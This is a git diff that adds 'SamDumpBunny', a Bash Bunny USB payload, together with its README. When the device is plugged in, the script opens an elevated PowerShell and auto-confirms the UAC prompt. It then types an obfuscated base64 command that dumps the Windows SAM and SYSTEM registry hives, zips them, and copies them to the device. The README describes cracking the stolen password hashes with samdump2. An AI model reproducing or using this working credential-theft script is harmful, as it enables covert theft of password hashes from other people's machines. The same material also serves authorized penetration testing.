diff --git a/payloads/library/credentials/SamDumpBunny/README.md b/payloads/library/credentials/SamDumpBunny/README.md new file mode 100644 index 00000000..7d023d7e --- /dev/null +++ b/payloads/library/credentials/SamDumpBunny/README.md @@ -0,0 +1,21 @@ +**Title: SamDumpBunny** + +

Author: 0iphor13
+OS: Windows
+Version: 1.0
+ +**What is SamDumpBunny?** +# +

SamDumpBunny dumps the users sam and system hive and compresses them into a zip file.
+Afterwards you can use a tool like samdump2 to extract the users hashes.

+ + +**Instruction:** +1. Plug in your Bashbunny and wait a few seconds + +2. Unzip the exfiltrated zip file onto your machine. + +3. Use a tool like samdump2 on your machine to extract the users hashes. + > `samdump2 BunnySys BunnySam` + +![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png) \ No newline at end of file diff --git a/payloads/library/credentials/SamDumpBunny/payload.txt b/payloads/library/credentials/SamDumpBunny/payload.txt new file mode 100644 index 00000000..cc3120e3 --- /dev/null +++ b/payloads/library/credentials/SamDumpBunny/payload.txt @@ -0,0 +1,53 @@ +#!/bin/bash +# +# Title: SamDumpBunny +# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes. +# Author: 0iphor13 +# Version: 1.0 +# Category: Credentials +# Attackmodes: HID, Storage + +LED SETUP + +Q DELAY 500 + +GET SWITCH_POSITION +DUCKY_LANG de + +Q DELAY 500 + +ATTACKMODE HID STORAGE + +#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING + +LED STAGE1 + +Q DELAY 1000 +RUN WIN "powershell Start-Process powershell -Verb runAs" +Q ENTER +Q DELAY 1000 + +#Shortcut for pressing yes - Needs to be adapted for your language (ger=ALT j;engl=ALT y; etc...) +Q ALT j +Q DELAY 250 + +Q DELAY 250 +Q STRING "powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAQgB1AG4AbgB5AFMAYQBtADsAcgBlAGcAIABzAGEAdgBlAC" +Q DELAY 250 +Q STRING "AAaABrAGwAbQBcAHMAeQBzAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgA" +Q DELAY 250 +Q STRING "CIAJABQAFcARABcAEIAdQBuAG4AeQBTAHkAcwAiACwAIAAiACQAUABXAEQAXABCAHUAbgBuAHkAUwBhAG0AIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBu" +Q DELAY 250 +Q STRING "AFAAYQB0AGgAIABTAGEAbQBEAHUAbQBwAEIAdQBuAG4AeQAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAcgBl" +Q DELAY 250 +Q STRING "AG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAYQBtADsAZQB4AGkAdAA=" +Q DELAY 250 +Q STRING ";mv SamDumpBunny.zip ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l" +Q DELAY 250 +Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';Start-Sleep 3;(New-Object -comObject Shel" +Q DELAY 250 +Q STRING "l.Application).Namespace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit" +Q DELAY 300 +Q ENTER + +LED FINISH \ No newline at end of file